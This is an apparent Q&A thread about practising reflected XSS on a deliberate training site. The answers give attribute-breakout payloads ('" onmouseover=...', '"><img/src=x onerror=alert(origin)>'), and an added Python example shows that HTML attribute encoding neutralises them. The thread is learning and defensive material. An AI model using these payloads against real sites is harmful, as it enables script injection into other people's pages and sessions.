Bug bounty XSS vulnerability website payload
I recently started to teach myself XSS vulnerability and stumbled upon this website for practice.
https://sudo.co.il/xss/level2.php
But after several attempts to enter several payloads
Example: <script>alert('XSS')</script>
I can't get XSS to work.
The value is reflected in the input value attribute. You can escape this by starting with a " and then add other attributes. For example: " onmouseover="alert('XSS')".
To require less user interaction you can change the style:
" onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
or there may be better attributes to use instead.
You can escape this by starting with a "
For example: "><img/src=x onerror=alert(origin)>
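Why the question's input stays inert while the two answers' inputs change the markup, and how attribute-context encoding closes the gap. This is an added example, not part of the original posts or the practice site's code; the `<input>` template and the field name `q` are assumptions about how the page reflects the value.

```python
from html import escape
from html.parser import HTMLParser

def render_vulnerable(value):
    # Assumed server behaviour: the raw parameter is pasted into value="...".
    return '<input type="text" name="q" value="' + value + '">'

def render_hardened(value):
    # Attribute-context encoding: & < > " ' all become character references.
    return '<input type="text" name="q" value="' + escape(value, quote=True) + '">'

class TagCollector(HTMLParser):
    """Records every start tag and its attributes as the parser sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def breaks_out(markup, original):
    """True when the input produced anything beyond the one intended field."""
    tags = parse(markup)
    if len(tags) != 1:
        return True  # an extra element was created
    tag, attrs = tags[0]
    return (tag != "input" or set(attrs) != {"type", "name", "value"}
            or attrs["value"] != original)

# Inputs quoted on this page: the question, the first answer, the second answer.
SAMPLES = [
    "<script>alert('XSS')</script>",
    "\" onmouseover=\"alert('XSS')\"",
    "\"><img/src=x onerror=alert(origin)>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample),
              "| raw breaks out:", breaks_out(render_vulnerable(sample), sample),
              "| encoded breaks out:", breaks_out(render_hardened(sample), sample))
```

With the raw template only the quote-led inputs alter the element; with encoding all three come back from the parser as the literal text of `value`.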